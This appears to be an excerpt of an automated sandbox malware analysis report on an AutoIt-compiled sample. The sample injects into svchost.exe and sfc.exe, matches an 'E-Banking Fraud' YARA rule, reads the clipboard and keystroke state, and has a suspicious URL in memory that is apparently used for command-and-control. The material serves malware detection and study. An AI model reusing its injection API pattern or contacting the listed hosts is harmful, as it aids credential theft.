                Source: sfc.exe, 00000009.00000002.3636474605.0000000004FF0000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.0000000004860000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.16544.pizza/q6tn/?8lQxv=ijsXK&7v=a9XpPJI/g468snPpmYXmOEBKUp82e4Qm8pbKtEIG/rWptSKHGLi8G
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: sfc.exe, 00000009.00000002.3636474605.00000000049A8000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.0000000004218000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2
                Source: sfc.exe, 00000009.00000002.3636474605.00000000049A8000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.0000000004218000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007F425A
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007F4458
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007F425A
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007E0219
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_0080CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0080CDAC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3633190664.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3635217909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1495187860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1496350328.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3635090476.00000000035D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3635125168.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1497049983.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: This is a third-party compiled AutoIt script.0_2_00783B4C
                Source: yloe82Jp1k.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: yloe82Jp1k.exe, 00000000.00000002.1196342126.0000000000835000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_377c4805-f
                Source: yloe82Jp1k.exe, 00000000.00000002.1196342126.0000000000835000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a8cf1d3b-9
                Source: yloe82Jp1k.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_90830b1f-4
                Source: yloe82Jp1k.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c2673032-f
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CD13 NtClose,1_2_0042CD13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B60 NtClose,LdrInitializeThunk,1_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037735C0 NtCreateMutant,LdrInitializeThunk,1_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774340 NtSetContextThread,1_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774650 NtSuspendThread,1_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BF0 NtAllocateVirtualMemory,1_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BE0 NtQueryValueKey,1_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BA0 NtEnumerateValueKey,1_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B80 NtQueryInformationFile,1_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AF0 NtWriteFile,1_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AD0 NtReadFile,1_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AB0 NtWaitForSingleObject,1_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F60 NtCreateProcessEx,1_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F30 NtCreateSection,1_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FE0 NtCreateFile,1_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FB0 NtResumeThread,1_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FA0 NtQuerySection,1_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F90 NtProtectVirtualMemory,1_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772E30 NtWriteVirtualMemory,1_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772EE0 NtQueueApcThread,1_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772EA0 NtAdjustPrivilegesToken,1_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772E80 NtReadVirtualMemory,1_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D30 NtUnmapViewOfSection,1_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D10 NtMapViewOfSection,1_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D00 NtSetInformationFile,1_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DD0 NtDelayExecution,1_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DB0 NtEnumerateKey,1_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C70 NtFreeVirtualMemory,1_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C60 NtCreateKey,1_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C00 NtQueryInformationProcess,1_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CF0 NtOpenProcess,1_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CC0 NtQueryVirtualMemory,1_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CA0 NtQueryInformationToken,1_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773010 NtOpenDirectoryObject,1_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773090 NtSetValueKey,1_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037739B0 NtGetContextThread,1_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773D70 NtOpenThread,1_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773D10 NtOpenProcessToken,1_2_03773D10
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03054340 NtSetContextThread,LdrInitializeThunk,9_2_03054340
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03054650 NtSuspendThread,LdrInitializeThunk,9_2_03054650
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052B60 NtClose,LdrInitializeThunk,9_2_03052B60
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03052BA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03052BE0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03052BF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052AD0 NtReadFile,LdrInitializeThunk,9_2_03052AD0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052AF0 NtWriteFile,LdrInitializeThunk,9_2_03052AF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052F30 NtCreateSection,LdrInitializeThunk,9_2_03052F30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052FB0 NtResumeThread,LdrInitializeThunk,9_2_03052FB0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052FE0 NtCreateFile,LdrInitializeThunk,9_2_03052FE0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03052E80
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03052EE0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03052D10
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03052D30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052DD0 NtDelayExecution,LdrInitializeThunk,9_2_03052DD0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03052DF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052C60 NtCreateKey,LdrInitializeThunk,9_2_03052C60
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03052C70
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03052CA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030535C0 NtCreateMutant,LdrInitializeThunk,9_2_030535C0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030539B0 NtGetContextThread,LdrInitializeThunk,9_2_030539B0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052B80 NtQueryInformationFile,9_2_03052B80
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052AB0 NtWaitForSingleObject,9_2_03052AB0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052F60 NtCreateProcessEx,9_2_03052F60
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052F90 NtProtectVirtualMemory,9_2_03052F90
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052FA0 NtQuerySection,9_2_03052FA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052E30 NtWriteVirtualMemory,9_2_03052E30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052EA0 NtAdjustPrivilegesToken,9_2_03052EA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052D00 NtSetInformationFile,9_2_03052D00
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052DB0 NtEnumerateKey,9_2_03052DB0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052C00 NtQueryInformationProcess,9_2_03052C00
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052CC0 NtQueryVirtualMemory,9_2_03052CC0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03052CF0 NtOpenProcess,9_2_03052CF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03053010 NtOpenDirectoryObject,9_2_03053010
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03053090 NtSetValueKey,9_2_03053090
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03053D10 NtOpenProcessToken,9_2_03053D10
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_03053D70 NtOpenThread,9_2_03053D70
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025D9740 NtReadFile,9_2_025D9740
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025D95D0 NtCreateFile,9_2_025D95D0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025D9A30 NtAllocateVirtualMemory,9_2_025D9A30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025D9830 NtDeleteFile,9_2_025D9830
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025D98D0 NtClose,9_2_025D98D0
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_007E4021
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007D8858
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007E545F
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_0078E8000_2_0078E800
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007ADBB50_2_007ADBB5
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_0078FE400_2_0078FE40
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_0078E0600_2_0078E060
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_0080804A0_2_0080804A
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007941400_2_00794140
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A24050_2_007A2405
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007B65220_2_007B6522
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007B267E0_2_007B267E
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_008006650_2_00800665
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007968430_2_00796843
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A283A0_2_007A283A
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007B89DF0_2_007B89DF
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_00800AE20_2_00800AE2
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_00798A0E0_2_00798A0E
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007B6A940_2_007B6A94
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E8B130_2_007E8B13
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007DEB070_2_007DEB07
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007ACD610_2_007ACD61
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007B70060_2_007B7006
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_0079710E0_2_0079710E
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007931900_2_00793190
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007812870_2_00781287
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A33C70_2_007A33C7
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007AF4190_2_007AF419
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A16C40_2_007A16C4
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007956800_2_00795680
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A78D30_2_007A78D3
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007958C00_2_007958C0
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A1BB80_2_007A1BB8
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007ABFE60_2_007ABFE6
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A1FD00_2_007A1FD0
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_01FB36100_2_01FB3610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418B931_2_00418B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031C01_2_004031C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012201_2_00401220
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F3731_2_0042F373
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041032C1_2_0041032C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103331_2_00410333
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023DC1_2_004023DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023E01_2_004023E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402CC01_2_00402CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402CB21_2_00402CB2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5431_2_0040E543
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004105531_2_00410553
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416D8E1_2_00416D8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416D931_2_00416D93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E6871_2_0040E687
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E6931_2_0040E693
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004047F41_2_004047F4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027B01_2_004027B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA3521_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038003E61_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F01_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E02741_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C02C01_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C81581_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038001AA1_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA1181_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037301001_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F81CC1_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F41A21_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D20001_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037407701_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037647501_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373C7C01_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375C6E01_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038005911_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037405351_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F24461_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E44201_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EE4F61_2_037EE4F6
